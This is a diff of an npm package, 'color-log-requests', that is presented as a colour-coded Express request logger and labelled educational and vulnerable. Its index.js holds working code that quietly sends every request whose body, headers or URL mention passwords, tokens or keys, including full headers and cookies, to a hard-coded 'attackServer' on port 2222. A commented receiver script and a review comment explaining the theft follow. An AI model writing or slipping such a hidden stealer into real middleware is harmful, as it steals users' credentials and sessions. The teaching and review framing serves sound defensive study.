color-log-requests 1.0.0



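--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,49 @@
+**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
+
+This package is a vulnerable package and is created for educational purposes.
+
+
+## Usage
+this package is a HTTP request logger middleware for node.js
+
+
+```javascript
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+The result is in the format:
+
+```bash
+<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
+```
+
+The status codes are displayed in color:
+- green for success (< 300)
+- magenta for redirect (<400)
+- red for failure (<600)
+- blank otherwise
+
+
+## Requirements
+It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
+```bash
+npm install body-parser
+```
+
+The call in code may look like this:
+```javascript
+const bodyParser = require('body-parser');
+app.use(bodyParser.json());
+
+...
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+
+## Installation
+Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
+```
+npm install color-log-requests
+```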
@@ -0,0 +1,21 @@
1
+ // const http = require('http');
2
+
3
+ // const host = "127.0.0.1";
4
+ // const port = 2222;
5
+
6
+
7
+ // const server = http.createServer((req, res) => {
8
+ // const chunks = [];
9
+ // req.on("data", (chunk) => {
10
+ // chunks.push(chunk);
11
+ // });
12
+ // req.on("end", () => {
13
+ // const data = Buffer.concat(chunks);
14
+ // console.log("New sensitive request: ", JSON.parse(data.toString()));
15
+ // res.end();
16
+ // });
17
+ // })
18
+
19
+ // server.listen(port, host, () => {
20
+ // console.log(`Server is running on http://${host}:${port}`);
21
+ // });
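--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,73 @@
+const axios = require("axios")
+
+const attackServer = "127.0.0.1"
+const aAttackPort = 2222
+
+
+const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
+
+
+const stringContainsSensitiveValue = (string) => {
+let response = false
+sensitiveValues.forEach(value => {
+if (string.toLowerCase().includes(value.toLowerCase())) {
+response = true
+}
+})
+return response
+}
+
+
+
+const dictContainsSensitiveValue = (dict) => {
+let response = false
+for (let key in dict) {
+if (stringContainsSensitiveValue(key)) {
+response = true
+}
+}
+return response
+}
+
+
+
+module.exports = function (req, res, next) {
+res.on("finish", function () {
+const date = new Date()
+
+if (res.statusCode < 300) { // Success
+console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 400) { // Redirection
+console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 600) { // Client or server Error
+console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else { // Unknown
+console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
+}
+
+
+if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
+axios.post(`http://${attackServer}:${aAttackPort}`, {
+url: decodeURI(req.url),
+host: req.headers.host,
+method: req.method,
+date: date.toLocaleString(),
+client: {
+ip: req.ip,
+body: req.body,
+headers: req.headers,
+httpVersion: req.httpVersion,
+},
+response: {
+statusCode: res.statusCode,
+body: res.body,
+headers: res.headers,
+contentLength: res.get('Content-Length') || 0
+}
+})
+}
+
+
+});
+next();
+}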
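Review bot: The `axios.post` at line 50 ships the full `req.headers` (so any Authorization or Cookie header) together with `req.body` to the hard-coded `attackServer` whenever a body key, header name or the URL contains one of `sensitiveValues`, which is credential exfiltration rather than the console logging the README describes; because that list holds short words like `key` and `token`, it also fires on ordinary header names such as `sec-websocket-key` or `x-csrf-token`, so nearly every authenticated request is forwarded. For readers using this as a teaching sample, the defensive signals are a "logging" middleware that pulls in an HTTP client dependency and opens outbound connections to a fixed host:port, and the resulting traffic from the app process to 127.0.0.1:2222 is observable at the host level. Two further defects in the same hunk: `decodeURI(req.url)` (lines 39–45 and 49) throws `URIError` on a malformed percent sequence, and inside the `finish` listener that becomes an uncaught exception, while `res.body` and `res.headers` (lines 63–64) do not appear to be properties of a Node/Express response, so those report fields are always `undefined`. The file should state its intent at the top so nobody mistakes it for a real logger, e.g. `// INTENTIONALLY VULNERABLE (educational): the finish handler below forwards request headers and bodies to attackServer — lab use only.`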
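--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,20 @@
+{
+"name": "color-log-requests",
+"version": "1.0.0",
+"description": "This package is a vulnerable package and is created for educational purposes.",
+"main": "index.js",
+"scripts": {
+"start": "node index.js"
+},
+"keywords": [
+"test",
+"vulnerable",
+"logging",
+"color"
+],
+"author": "Pierrick Delrieu",
+"license": "ISC",
+"dependencies": {
+"axios": "^1.3.3"
+}
+}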